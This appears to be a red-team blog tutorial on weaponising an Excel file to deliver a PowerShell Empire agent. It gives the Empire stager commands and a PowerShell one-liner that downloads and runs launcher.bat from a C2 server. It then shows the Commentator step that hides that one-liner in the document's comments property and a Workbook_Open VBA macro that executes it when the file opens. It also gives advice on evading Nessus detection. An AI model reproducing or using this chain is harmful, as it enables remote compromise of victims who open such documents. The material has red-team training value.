Building on from my previous post, this will primarily focus on delivering an Empire payload via an embedded offensive PowerShell script stored within the ‘comments’ property of an MS Excel document.
PowerShell Empire:
Begin by creating an Empire listener, see Empire’s documentation on how to get started with this by visiting the following URL: https://www.powershellempire.com/?page_id=83
Note that in my configuration as illustrated in the screenshot below, the ‘Host’ entry, does not correspond to my C2 Empire Server, instead, this has been configured to point to a reverse-proxy utilising TLS / SSL encryption. This is considered to be good ‘OPSEC’ practice and allows easier portability.
The ‘Slack’ configuration has also been configured so that notifications will appear in our chosen Slack channel when agents are established.
Note: The agent strings were left in their default configuration, I advise these to be changed on actual engagements, as Nessus has the ability to detect Empire Listeners via the plugin id: 99592
https://www.tenable.com/plugins/index.php?view=single&id=99592
The next part of the process is to create a stager, this is our payload we’ll use when weaponizing a MS Excel document. For this example I’m going to use the self-deleting .bat executable:
Empire: listeners) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > set Listener http
By default, the payload will be written to /tmp. Serve the payload via HTTP by launching a Python HTTP Server:
root@kali:/tmp# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...Now it comes to weaponizing the MS Excel document, the steps in order to do this is similar to before, except the following offensive PowerShell script will be used to embed inside the ‘Comments’ property of the MS Excel document:
PowerShell (New-Object System.Net.WebClient).DownloadFile(‘http://192.168.0.11:8000/launcher.bat’,’test.bat’);Start-Process ‘test.bat’
Note: The IP address: 192.168.0.11 is our Empire C2 server which is serving the launcher.bat payload. This will likely to be different in your environment.
Upon execution, the PowerShell script will retrieve the Empire payload and execute it on the victim host.
In order to embed this command into a MS Excel document within the ‘comments’ property and execute it from an embedded Macro. This can easily be done by using the PowerShell script: ‘Commentator’ (https://github.com/clr2of8/Commentator)
Begin by starting PowerShell:
powershell.exe -exec bypassImport the module into your PowerShell environment:
Import-Module .\Commentator.ps1And execute the script to embed our payload into the ‘comments’ property of the MS Excel document:
Invoke-Commentator -OfficeFile .\empire_posh_delivery.xlsx –CommentFile .\empire_posh_payload.txtNote: Given the size of the PowerShell script above, this was placed within the text file: empire_posh_payload.txt
After successful execution, a copy of your existing MS Office file will be created with the payload embedded:
The new file with added comment has been written to .\empire_posh_delivery-wlc.xlsx.
DONE!
This can be verified by inspecting the file’s metadata / properties:
Lastly, in order to execute the payload embedded within the ‘comments’ property, the following embedded Macro can be used:
Sub Workbook_Open()
Dim p As DocumentProperty
For Each p In ActiveWorkbook.BuiltinDocumentProperties
If p.Name = "Comments" Then
Shell (p.Value)
End If
Next
End SubNote: In order to utilise auto-execution via the ‘Workbook_Open()’ function, the weaponised MS Excel document needed to be downgraded to Office 98 – 2003 compatibility (.xls)
After the victim has clicked ‘enable editing’ and ‘enable content’, an Empire agent session should appear:
